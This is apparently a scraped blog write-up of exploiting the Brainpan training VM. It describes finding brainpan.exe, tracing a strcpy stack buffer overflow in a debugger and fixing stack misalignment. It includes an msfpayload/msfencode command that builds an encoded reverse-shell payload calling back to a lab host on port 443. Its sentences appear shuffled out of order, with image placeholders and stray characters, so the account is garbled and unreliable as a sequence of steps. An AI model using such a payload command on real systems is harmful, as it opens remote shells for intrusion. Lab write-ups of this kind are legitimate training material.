![]() ![]() # msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.74 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t c This aligned my stack properly and allowed me to run a reverse shell. I had to jump a little further back to take advantage of some extra instructions: To mitigate this, instead of my payload looking like this: ![]() This is a very straightforward stack-based buffer overflow, but continually my stack would get corrupted and shift by one or two bytes: I find it interesting that we were given a copy of the file as a exe instead of an ELF, considering what the host is running.Įxploiting this particular binary was not hard, but I ran into an issue that made it more difficult than it should’ve been. So it appears we need to attach to the login form and see if we can get it to explode with shell execution. ![]() Looks like this is just a copy of the program that is running in the virtual machine, and according to my registers, vulnerable: It appeared that our password was shitstorm, following a strcpy of the incoming buffer. I loaded this up into a debugger to see what was inside: I fired up DirBuster to see what I could find, and very quickly I stumped onto /bin/, which contained a single file, brainpan.exe. I tried a few basic injections and default passwords to no avail. ![]()
0 Comments
Leave a Reply. |